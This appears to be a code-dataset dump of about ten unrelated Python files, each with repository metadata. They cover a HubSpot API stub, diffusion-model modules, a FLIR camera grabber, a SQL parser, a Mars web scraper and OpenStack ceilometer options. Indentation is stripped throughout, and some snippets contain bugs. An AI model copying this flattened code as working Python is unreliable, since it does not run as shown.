data=payload,
params=querystring
)
print(response.text)
pass
def delete_list():
pass
def get_all_contacts_from_a_list(self, list_id):
url = self._lists_url + '/' + list_id + '/contacts/all'
querystring = {
'vidOffset': '0',
'count': '100',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def add_contacts_in_a_static_list(self, list_id, array_of_ids):
url = self._lists_url + '/' + list_id + '/add'
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
vids: array_of_ids
})
response = requests.request(
'POST',
url,
data=payload,
params=querystring
)
print(response.text)
##### DEAL APIS #####
# create deal
def get_deal_owner_by_id():
# check deal id or owner id
pass
def create_deal():
pass
def associate_contact_to_deal():
pass
def associate_account_to_deal():
pass
def dissociate_contact_from_deal():
pass
def find_deal_owner():
# yes
pass
def test():
pass
| 2.40625 | 2 |
mmgen/models/architectures/ddpm/modules.py | plutoyuxie/mmgeneration | 718 | 12796227 | <reponame>plutoyuxie/mmgeneration<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
from copy import deepcopy
from functools import partial
import mmcv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ACTIVATION_LAYERS
from mmcv.cnn.bricks import build_activation_layer, build_norm_layer
from mmcv.cnn.utils import constant_init
from mmgen.models.builder import MODULES, build_module
class EmbedSequential(nn.Sequential):
"""A sequential module that passes timestep embeddings to the children that
support it as an extra input.
Modified from
https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35
"""
def forward(self, x, y):
for layer in self:
if isinstance(layer, DenoisingResBlock):
x = layer(x, y)
else:
x = layer(x)
return x
@ACTIVATION_LAYERS.register_module()
class SiLU(nn.Module):
r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise.
The SiLU function is also known as the swish function.
Args:
input (bool, optional): Use inplace operation or not.
Defaults to `False`.
"""
def __init__(self, inplace=False):
super().__init__()
if torch.__version__ < '1.6.0' and inplace:
mmcv.print_log('Inplace version of \'SiLU\' is not supported for '
f'torch < 1.6.0, found \'{torch.version}\'.')
self.inplace = inplace
def forward(self, x):
"""Forward function for SiLU.
Args:
x (torch.Tensor): Input tensor.
Returns:
torch.Tensor: Tensor after activation.
"""
if torch.__version__ < '1.6.0':
return x * torch.sigmoid(x)
return F.silu(x, inplace=self.inplace)
@MODULES.register_module()
class MultiHeadAttention(nn.Module):
"""An attention block allows spatial position to attend to each other.
Originally ported from here, but adapted to the N-d case.
https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa
Args:
in_channels (int): Channels of the input feature map.
num_heads (int, optional): Number of heads in the attention.
norm_cfg (dict, optional): Config for normalization layer. Default
to ``dict(type='GN', num_groups=32)``
"""
def __init__(self,
in_channels,
num_heads=1,
norm_cfg=dict(type='GN', num_groups=32)):
super().__init__()
self.num_heads = num_heads
_, self.norm = build_norm_layer(norm_cfg, in_channels)
self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)
self.proj = nn.Conv1d(in_channels, in_channels, 1)
self.init_weights()
@staticmethod
def QKVAttention(qkv):
channel = qkv.shape[1] // 3
q, k, v = torch.chunk(qkv, 3, dim=1)
scale = 1 / np.sqrt(np.sqrt(channel))
weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)
weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)
weight = torch.einsum('bts,bcs->bct', weight, v)
return weight
def forward(self, x):
"""Forward function for multi head attention.
Args:
x (torch.Tensor): Input feature map.
Returns:
torch.Tensor: Feature map after attention.
"""
b, c, *spatial = x.shape
x = x.reshape(b, c, -1)
qkv = self.qkv(self.norm(x))
qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])
h = self.QKVAttention(qkv)
h = h.reshape(b, -1, h.shape[-1])
h = self.proj(h)
return (h + x).reshape(b, c, *spatial)
def init_weights(self):
constant_init(self.proj, 0)
@MODULES.register_module()
class TimeEmbedding(nn.Module):
"""Time embedding layer, reference to Two level embedding. First embedding
time by an embedding function, then feed to neural networks.
Args:
in_channels (int): The channel number of the input feature map.
embedding_channels (int): The channel number of the output embedding.
embedding_mode (str, optional): Embedding mode for the time embedding.
Defaults to 'sin'.
embedding_cfg (dict, optional): Config for time embedding.
Defaults to None.
act_cfg (dict, optional): Config for activation layer. Defaults to
``dict(type='SiLU', inplace=False)``.
"""
def __init__(self,
in_channels,
embedding_channels,
embedding_mode='sin',
embedding_cfg=None,
act_cfg=dict(type='SiLU', inplace=False)):
super().__init__()
self.blocks = nn.Sequential(
nn.Linear(in_channels, embedding_channels),
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_channels))
# add `dim` to embedding config
embedding_cfg_ = dict(dim=in_channels)
if embedding_cfg is not None:
embedding_cfg_.update(embedding_cfg)
if embedding_mode.upper() == 'SIN':
self.embedding_fn = partial(self.sinusodial_embedding,
**embedding_cfg_)
else:
raise ValueError('Only support `SIN` for time embedding, '
f'but receive {embedding_mode}.')
@staticmethod
def sinusodial_embedding(timesteps, dim, max_period=10000):
"""Create sinusoidal timestep embeddings.
Args:
timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape
as ``[bz, ]``, one per batch element.
dim (int): The dimension of the embedding.
max_period (int, optional): Controls the minimum frequency of the
embeddings. Defaults to ``10000``.
Returns:
torch.Tensor: Embedding results shape as `[bz, dim]`.
"""
half = dim // 2
freqs = torch.exp(
-np.log(max_period) *
torch.arange(start=0, end=half, dtype=torch.float32) /
half).to(device=timesteps.device)
args = timesteps[:, None].float() * freqs[None]
embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
if dim % 2:
embedding = torch.cat(
[embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
return embedding
def forward(self, t):
"""Forward function for time embedding layer.
Args:
t (torch.Tensor): Input timesteps.
Returns:
torch.Tensor: Timesteps embedding.
"""
return self.blocks(self.embedding_fn(t))
@MODULES.register_module()
class DenoisingResBlock(nn.Module):
"""Resblock for the denoising network. If `in_channels` not equals to
`out_channels`, a learnable shortcut with conv layers will be added.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int): Number of channels of the input embedding.
use_scale_shift_norm (bool): Whether use scale-shift-norm in
`NormWithEmbedding` layer.
dropout (float): Probability of the dropout layers.
out_channels (int, optional): Number of output channels of the
ResBlock. If not defined, the output channels will equal to the
`in_channels`. Defaults to `None`.
norm_cfg (dict, optional): The config for the normalization layers.
Defaults too ``dict(type='GN', num_groups=32)``.
act_cfg (dict, optional): The config for the activation layers.
Defaults to ``dict(type='SiLU', inplace=False)``.
shortcut_kernel_size (int, optional): The kernel size for the shortcut
conv. Defaults to ``1``.
"""
def __init__(self,
in_channels,
embedding_channels,
use_scale_shift_norm,
dropout,
out_channels=None,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
shortcut_kernel_size=1):
super().__init__()
out_channels = in_channels if out_channels is None else out_channels
_norm_cfg = deepcopy(norm_cfg)
_, norm_1 = build_norm_layer(_norm_cfg, in_channels)
conv_1 = [
norm_1,
build_activation_layer(act_cfg),
nn.Conv2d(in_channels, out_channels, 3, padding=1)
]
self.conv_1 = nn.Sequential(*conv_1)
norm_with_embedding_cfg = dict(
in_channels=out_channels,
embedding_channels=embedding_channels,
use_scale_shift=use_scale_shift_norm,
norm_cfg=_norm_cfg)
self.norm_with_embedding = build_module(
dict(type='NormWithEmbedding'),
default_args=norm_with_embedding_cfg)
conv_2 = [
build_activation_layer(act_cfg),
nn.Dropout(dropout),
nn.Conv2d(out_channels, out_channels, 3, padding=1)
]
self.conv_2 = nn.Sequential(*conv_2)
assert shortcut_kernel_size in [
1, 3
], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
f'receive {shortcut_kernel_size}.')
self.learnable_shortcut = out_channels != in_channels
if self.learnable_shortcut:
shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
self.shortcut = nn.Conv2d(
in_channels,
out_channels,
shortcut_kernel_size,
padding=shortcut_padding)
self.init_weights()
def forward_shortcut(self, x):
if self.learnable_shortcut:
return self.shortcut(x)
return x
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
shortcut = self.forward_shortcut(x)
x = self.conv_1(x)
x = self.norm_with_embedding(x, y)
x = self.conv_2(x)
return x + shortcut
def init_weights(self):
# apply zero init to last conv layer
constant_init(self.conv_2[-1], 0)
@MODULES.register_module()
class NormWithEmbedding(nn.Module):
"""Nornalization with embedding layer. If `use_scale_shift == True`,
embedding results will be chunked and used to re-shift and re-scale
normalization results. Otherwise, embedding results will directly add to
input of normalization layer.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int) Number of channels of the input embedding.
norm_cfg (dict, optional): Config for the normalization operation.
Defaults to `dict(type='GN', num_groups=32)`.
act_cfg (dict, optional): Config for the activation layer. Defaults
to `dict(type='SiLU', inplace=False)`.
use_scale_shift (bool): If True, the output of Embedding layer will be
split to 'scale' and 'shift' and map the output of normalization
layer to ``out * (1 + scale) + shift``. Otherwise, the output of
Embedding layer will be added with the input before normalization
operation. Defaults to True.
"""
def __init__(self,
in_channels,
embedding_channels,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
use_scale_shift=True):
super().__init__()
self.use_scale_shift = use_scale_shift
_, self.norm = build_norm_layer(norm_cfg, in_channels)
embedding_output = in_channels * 2 if use_scale_shift else in_channels
self.embedding_layer = nn.Sequential(
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_output))
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
embedding = self.embedding_layer(y)[:, :, None, None]
if self.use_scale_shift:
scale, shift = torch.chunk(embedding, 2, dim=1)
x = self.norm(x)
x = x * (1 + scale) + shift
else:
x = self.norm(x + embedding)
return x
@MODULES.register_module()
class DenoisingDownsample(nn.Module):
"""Downsampling operation used in the denoising network. Support average
pooling and convolution for downsample operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether use convolution operation for
downsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1)
else:
self.downsample = nn.AvgPool2d(stride=2)
def forward(self, x):
"""Forward function for downsampling operation.
Args:
x (torch.Tensor): Feature map to downsample.
Returns:
torch.Tensor: Feature map after downsampling.
"""
return self.downsample(x)
@MODULES.register_module()
class DenoisingUpsample(nn.Module):
"""Upsampling operation used in the denoising network. Allows users to
apply an additional convolution layer after the nearest interpolation
operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether apply an additional convolution
layer after upsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.with_conv = True
self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)
def forward(self, x):
"""Forward function for upsampling operation.
Args:
x (torch.Tensor): Feature map to upsample.
Returns:
torch.Tensor: Feature map after upsampling.
"""
x = F.interpolate(x, scale_factor=2, mode='nearest')
if self.with_conv:
x = self.conv(x)
return x
| 2.265625 | 2 |
0_PythonFundamental/1_15_conditioning2.py | hnwarid/DQLabAcademy | 0 | 12796228 | jam = 13
if 5 <= jam < 12: # selama jam di antara 5 s.d. 12
print("Selamat pagi!")
elif jam >= 12 and jam < 17: # selama jam di antara 12 s.d. 17 # simplified: elif 12 <= jam < 17
print("Selamat siang!")
elif jam >= 17 and jam < 19: # selama jam di antara 17 s.d. 19
print("Selamat sore!")
else: # selain kondisi di atas
print("Selamat malam!")
| 3.765625 | 4 |
flir_frame_grabber.py | ralphkok/flir-frame-grabber | 1 | 12796229 | <filename>flir_frame_grabber.py
import PySpin
import threading
import time
import cv2
class FLIRFrameGrabber:
_is_camera_inited = False
_latest_camera_frame = None
_last_frame_grab_time = 0
_frame_grab_fps = 0
def is_running(self):
return self._is_running
def get_camera(self):
return self._camera
def get_dimensions(self):
return (self._camera_width, self._camera_height)
def get_fps(self):
return self._frame_grab_fps
def set_latest_frame(self, frame):
self._latest_camera_frame = frame
now = time.time()
duration = now - self._last_frame_grab_time
self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration)
self._last_frame_grab_time = now
def get_latest_frame(self):
return self._latest_camera_frame is not None, self._latest_camera_frame
def __init__(self, serial=None):
if serial is None:
raise Exception("Please provide a valid FLIR camera serial number")
self._serial = serial;
self._system = PySpin.System.GetInstance()
self._camera_list = self._system.GetCameras()
self._camera = self._camera_list.GetBySerial(serial)
self._camera.Init()
self._camera_width = self._camera.Width()
self._camera_height = self._camera.Height()
self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)
self._camera.BeginAcquisition()
self._is_camera_inited = True
self._is_running = False
def deinit(self):
self.stop()
if (self._is_camera_inited is True):
self._is_camera_inited = False
self._camera.EndAcquisition()
self._camera.DeInit()
del self._camera
del self._camera_width
del self._camera_height
self._camera_list.Clear()
del self._camera_list
self._system.ReleaseInstance()
del self._system
del self._serial
def start(self, num_threads = 1):
if (self._is_running is not True):
self._is_running = True
self._threads = []
for i in range(num_threads):
worker = FrameGrabWorker(i)
thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False)
thread.start()
self._threads.append(thread)
def stop(self):
if (self._is_running is True):
self._is_running = False
for thread in self._threads:
thread.join()
del self._threads
if (self._latest_camera_frame is not None):
self._latest_camera_frame = None
class FrameGrabWorker:
def __init__(self, index):
self._index = index
self._lock = threading.Lock()
def get_camera_frame(self, target):
while target.is_running():
with self._lock:
frame = target.get_camera().GetNextImage()
width, height = target.get_dimensions()
img = frame.GetData().reshape(height, width)
target.set_latest_frame(img)
frame.Release() | 2.5 | 2 |
file_builder/test/lambda_test.py | btrekkie/file-builder | 1 | 12796230 | import os
from .. import FileBuilder
from .file_builder_test import FileBuilderTest
class LambdaTest(FileBuilderTest):
"""Tests that ``FileBuilder`` methods accept lambda arguments.
Tests that ``FileBuilder`` methods accept lambdas for arguments that
must be callables.
"""
def _build_file(self, builder, filename):
"""Build file function for ``LambdaTest``."""
self._write(filename, 'text')
def _subbuild(self, builder, dir_):
"""Subbuild function for ``LambdaTest``."""
builder.build_file(
os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file)
builder.build_file(
os.path.join(dir_, 'Output2.txt'), 'build_file',
lambda builder, filename: self._write(filename, 'text'))
def _build(self, builder):
"""Build function for ``LambdaTest``."""
builder.subbuild(
'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1'))
builder.subbuild(
'subbuild',
lambda builder, dir_: self._subbuild(builder, dir_),
os.path.join(self._temp_dir, 'Dir2'))
def test_lambda(self):
"""Test that ``FileBuilder`` methods accept lambda arguments.
Test that ``FileBuilder`` methods accept lambdas for arguments
that must be callable.
"""
FileBuilder.build(self._cache_filename, 'lambda_test', self._build)
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
FileBuilder.clean(self._cache_filename, 'lambda_test')
self.assertEqual([], os.listdir(self._temp_dir))
FileBuilder.build(
self._cache_filename, 'lambda_test',
lambda builder: self._build(builder))
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
| 2.78125 | 3 |
parser/team09/instrucciones.py | MinervaVilchez/tytus | 0 | 12796231 | <filename>parser/team09/instrucciones.py
import tabla_simbolos as TS
import Errores as E
base_actual = None
class Instruccion():
def __init__(self, tipo, instruccion):
self.tipo = tipo
self.instruccion = instruccion
class Select():
def __init__(self, dist, selcol, fromcol, joins, order, conditions):
self.dist = dist
self.selcol = selcol
self.fromcol = fromcol
self.joins = joins
self.order = order
self.conditions = conditions
def execute():
#Llamar metodo que realizara el select
print('ejecutando select')
class AlterTable():
def __init__(self, id, cols, constrain, fkey, ref):
self.id = id
self.cols = cols
self.constrain = constrain
self.fkey = fkey
self.ref = ref
def execute(self):
print('ejecutando alter table')
print('id : ' + str(self.id))
print('cols : ' + str(self.cols))
print('constrain : ' + str(self.constrain))
print('foreing keys :' + str(self.fkey))
print('references : ' + str(self.ref))
class CreateDB():
def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer
self.replace = replace # si existe, la reemplaza/modifica
self.ifnot = ifnot # si existe, no la crea
self.id = id # nombre de la base de datos
self.owner = owner # nombre/id del creador
self.mode = mode # modo de almacenamiento
def execute(self, ts_global):
nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None)
existe = False # bandera para comprobar si existe
bases = ts_global.get_databases() # obtiene todas las bases de datos
for base in bases: # recorro la lista de bases de datos
if base.id == self.id: # y verifico si existe
existe = True # si existe, cambio el valor de la bandera
break # y salgo de la comprobación
if not self.ifnot: # si no viene "IF NOT EXISTS", se crea/reemplaza
if self.replace: # si viene "OR REPLACE"
if existe: # si existe la base de datos
ts_global.drop_db(self.id) # se elimina, luego
ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo
else: # si no viene "OR REPLACE"
if existe: # si existe, es un error
nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \'' + self.id + '\'.')
#ls_error.append(nuevo_error) #se agrega el error a la lista
else: # si no existe
ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo
else: # si sí viene "IF NOT EXISTS"
if self.replace: # si viene "OR REPLACE", es error
nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \'OR REPLACE\' e \'IF NOT EXISTS\'.')
#ls_error.append(nuevo_error) #se agrega el error a la lista
else: # si no viene "OR REPLACE"
if not existe: # si no existe la base de datos
ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo contrario no se hace nada
class UseDB():
def __init__(self, id): # string
self.id = id # nombre de la base de datos
def execute(self, ts_global):
bases = ts_global.get_databases() # obtiene todas las bases de datos
for base in bases: # verifico si existe:
if base.id == self.id: # si sí existe, retorno el id
return self.id # si no, es error
new_error = E.Errores('Semántico.', 'La base de datos \'' + self.id + '\' no existe.')
#ls_error.append(new_error) #se agrega el error a la lista
return None # y retorno None
class ShowDB():
def __init__(self):
print('show')
def execute(self, ts_global):
bases = ts_global.get_databases() # obtiene todas las bases de datos
if len(bases) == 0: # si no hay bases de datos
return '\n\tNo hay bases de datos creadas.\n' # se retorna un mensaje
respuesta = '\n' # de lo contrario,
for base in bases: # recorre la lista,
respuesta = respuesta + '\t' + base.id + '\n' # se concatenan los nombres
return respuesta + '\n' # y los retorna
class Drop():
def __init__(self, id):
self.id = id
def execute(self):
print('Ejecutando Drop')
print('id : ' + self.id)
class CreateTable():
def __init__(self, id, base, cols, inh):
self.id = id,
self.base = base
self.cols = cols
self.inh = inh
def execute(self,ts):
print('Ejecutando Creare Table')
print('id : ' + str(self.id))
for col in self.cols :
print('col id : ' + str(col.id))
print('col type : ' + str(col.tipo))
if self.inh != None :
print('Inherit : ' + self.inh)
class Insert():
def __init__(self, id, vals):
print('init')
self.id = id
self.vals = vals
def execute(self):
print('Ejecutando Insert')
print('id : ' + str(self.id))
for val in self.vals:
print('value : ' + str(val))
class Delete():
def __init__(self, id, cond):
self.id = id
self.cond = cond
def execute(self):
print('Ejecutando Delete')
print('id : ' + str(self.id))
class Update():
def __init__(self, id, vals):
self.id = id
self.vals = vals
def execute(self):
print('Ejecutando Update')
print('id : ' + str(id))
'''
import tabla_simbolos as TS
import Errores as E
#Creación de la tabla de simbolos
ts_global = TS.tabla_simbolos()
#Creación de lista de errores
ls_error = []
def create_table(db, nombre, columnas, ts):
nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None)
x = columnas.split(",")
for i in x:
c = i.split(":")
print('El nombre es -> ' + c[0] + ' y el tipo es -> ' + c[1])
#create_column(db, nombre, c[0], c[1], ts)
ts.agregar_simbolo(nueva_tabla)
return ts
def create_column(db, tabla, columna, tipo, ts):
nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None)
agregar = ts.agregar_columna(tabla, db, nueva_columna)
''' | 2.6875 | 3 |
scrape_mars.py | asianhenry/web-scraping-challenge | 0 | 12796232 | #!/usr/bin/env python
# coding: utf-8
def scrape():
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import time
#dictionary with all data
mars_data={}
executable_path = {'executable_path': 'chromedriver.exe'}
browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
url_1 = 'https://mars.nasa.gov/news/'
browser.visit(url_1)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
search = soup.find('section', class_= 'grid_gallery module list_view')
title_search = search.find_all('div', class_= 'content_title',limit=1)
p_search = search.find_all('div', class_='article_teaser_body',limit=1)
news_title = title_search[0].a.text
news_p = p_search[0].text
#add data to dictionary
mars_data['news_title']=news_title
mars_data['news_p']=news_p
url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
browser.visit(url_2)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#click the full image button
click1=browser.find_by_css('a[class="button fancybox"]').click()
##click1=browser.links.find_by_partial_text('FULL IMAGE').click()
#click the more info button
click2=browser.links.find_by_partial_text('more info').click()
#parse the page
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#find the link to the full size image
img_partial = soup.find_all('img',class_='main_image')[0]['src']
featured_img_url = f'https://www.jpl.nasa.gov{img_partial}'
mars_data['featured_img_url']=featured_img_url
featured_img_url
twitter_url = 'https://twitter.com/MarsWxReport?lang=en'
browser.visit(twitter_url)
time.sleep(2)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
tweet_search = soup.find_all('article')
mars_weather=tweet_search[0].find_all('span')[4].text
mars_data['mars_weather']=mars_weather
mars_weather
facts_url = 'https://space-facts.com/mars/'
browser.visit(facts_url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
facts_table = pd.read_html(facts_url)
mars_table = facts_table[0]
mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''})
mars_table = mars_table.set_index('Mars Planet Profile', drop=True)
mars_table
mars_table.to_html('mars_html')
mars_data['mars_facts']=mars_table.to_html(justify='left')
hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
base_url = 'https://astrogeology.usgs.gov/'
browser.visit(hemisphere_url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#click the image link to get to the page with the full res image
browser.find_by_css('img[class="thumb"]')[0].click()
#get html again after clicking page
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#find image link and title
img_search = soup.find_all('img',class_='wide-image' )
title_search = soup.find_all('h2',class_='title')
#titles had the word 'enhanced' at the end, just getting rid of that
' '.join(title_search[0].text.split(' ')[:-1])
img_link = base_url + img_search[0]['src']
img_link
#do all of the step above for each hemisphere
img_urls =[]
titles=[]
for i in range(4):
browser.visit(hemisphere_url)
time.sleep(1)
browser.find_by_css('img[class="thumb"]')[i].click()
time.sleep(1)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
img_search = soup.find_all('img',class_='wide-image' )
title_search = soup.find_all('h2',class_='title')
titles.append(' '.join(title_search[0].text.split(' ')[:-1]))
img_urls.append(base_url + img_search[0]['src'])
img_urls
titles
hemisphere_image_urls = []
urls ={}
for i in range(4):
urls['title']=titles[i]
urls['img_url']=img_urls[i]
hemisphere_image_urls.append(urls)
urls={}
mars_data['hemisphere_image_urls']=hemisphere_image_urls
hemisphere_image_urls
return mars_data
| 3.234375 | 3 |
python/exercicios_avaliativos/cap_3/fibonacci.py | alavarsedouglas/fiap_repository | 0 | 12796233 | <filename>python/exercicios_avaliativos/cap_3/fibonacci.py
f = []
f.append(1)
f.append(1)
n = 0
test = int(input('Digite a posição desejada para saber o número de Fibonacci: '))
while n <= test:
f.append(f[n] + f[n+1])
n += 1
print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1, f[n-2]))
| 4.125 | 4 |
packages/python.py | zpcc/mpkg-pkgs | 1 | 12796234 | from mpkg.common import Soft
from mpkg.utils import Search
class Package(Soft):
ID = 'python'
def _prepare(self):
data = self.data
links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe',
'64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'}
url = 'https://www.python.org/'
data.ver = Search(url, 'Latest: .*Python ([\\d\\.]+)')
data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog'
data.arch = Search(links=links, ver=data.ver)
| 2.328125 | 2 |
ceilometer/opts.py | andymcc/ceilometer | 0 | 12796235 | # Copyright 2014 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import socket
from keystoneauth1 import loading
from oslo_config import cfg
import ceilometer.agent.manager
import ceilometer.api.app
import ceilometer.api.controllers.v2.root
import ceilometer.collector
import ceilometer.compute.discovery
import ceilometer.compute.util
import ceilometer.compute.virt.inspector
import ceilometer.compute.virt.libvirt.inspector
import ceilometer.compute.virt.vmware.inspector
import ceilometer.compute.virt.xenapi.inspector
import ceilometer.coordination
import ceilometer.dispatcher
import ceilometer.dispatcher.file
import ceilometer.dispatcher.gnocchi_opts
import ceilometer.dispatcher.http
import ceilometer.energy.kwapi
import ceilometer.event.converter
import ceilometer.exchange_control
import ceilometer.hardware.discovery
import ceilometer.hardware.pollsters.generic
import ceilometer.image.discovery
import ceilometer.ipmi.notifications.ironic
import ceilometer.ipmi.platform.intel_node_manager
import ceilometer.ipmi.pollsters
import ceilometer.keystone_client
import ceilometer.meter.notifications
import ceilometer.middleware
import ceilometer.neutron_client
import ceilometer.notification
import ceilometer.nova_client
import ceilometer.objectstore.rgw
import ceilometer.objectstore.swift
import ceilometer.pipeline
import ceilometer.publisher.messaging
import ceilometer.publisher.utils
import ceilometer.sample
import ceilometer.storage
import ceilometer.utils
import ceilometer.volume.discovery
OPTS = [
cfg.StrOpt('host',
default=socket.gethostname(),
sample_default='<your_hostname>',
help='Name of this node, which must be valid in an AMQP '
'key. Can be an opaque identifier. For ZeroMQ only, must '
'be a valid host name, FQDN, or IP address.'),
cfg.IntOpt('http_timeout',
default=600,
help='Timeout seconds for HTTP requests. Set it to None to '
'disable timeout.'),
]
def list_opts():
# FIXME(sileht): readd pollster namespaces in the generated configfile
# This have been removed due to a recursive import issue
return [
('DEFAULT',
itertools.chain(ceilometer.agent.manager.OPTS,
ceilometer.api.app.OPTS,
ceilometer.compute.util.OPTS,
ceilometer.compute.virt.inspector.OPTS,
ceilometer.compute.virt.libvirt.inspector.OPTS,
ceilometer.dispatcher.OPTS,
ceilometer.ipmi.notifications.ironic.OPTS,
ceilometer.middleware.OPTS,
ceilometer.nova_client.OPTS,
ceilometer.objectstore.swift.OPTS,
ceilometer.pipeline.OPTS,
ceilometer.sample.OPTS,
ceilometer.utils.OPTS,
ceilometer.exchange_control.EXCHANGE_OPTS,
OPTS)),
('api', itertools.chain(ceilometer.api.app.API_OPTS,
ceilometer.api.controllers.v2.root.API_OPTS)),
('collector', ceilometer.collector.OPTS),
('compute', ceilometer.compute.discovery.OPTS),
('coordination', ceilometer.coordination.OPTS),
('database', ceilometer.storage.OPTS),
('dispatcher_file', ceilometer.dispatcher.file.OPTS),
('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts),
('dispatcher_gnocchi',
ceilometer.dispatcher.gnocchi_opts.dispatcher_opts),
('event', ceilometer.event.converter.OPTS),
('hardware', itertools.chain(
ceilometer.hardware.discovery.OPTS,
ceilometer.hardware.pollsters.generic.OPTS)),
('ipmi',
itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS,
ceilometer.ipmi.pollsters.OPTS)),
('meter', ceilometer.meter.notifications.OPTS),
('notification', ceilometer.notification.OPTS),
('polling', ceilometer.agent.manager.POLLING_OPTS),
('publisher', ceilometer.publisher.utils.OPTS),
('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS),
('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS),
# NOTE(sileht): the configuration file contains only the options
# for the password plugin that handles keystone v2 and v3 API
# with discovery. But other options are possible.
('service_credentials', ceilometer.keystone_client.CLI_OPTS),
('service_types',
itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS,
ceilometer.image.discovery.SERVICE_OPTS,
ceilometer.neutron_client.SERVICE_OPTS,
ceilometer.nova_client.SERVICE_OPTS,
ceilometer.objectstore.rgw.SERVICE_OPTS,
ceilometer.objectstore.swift.SERVICE_OPTS,
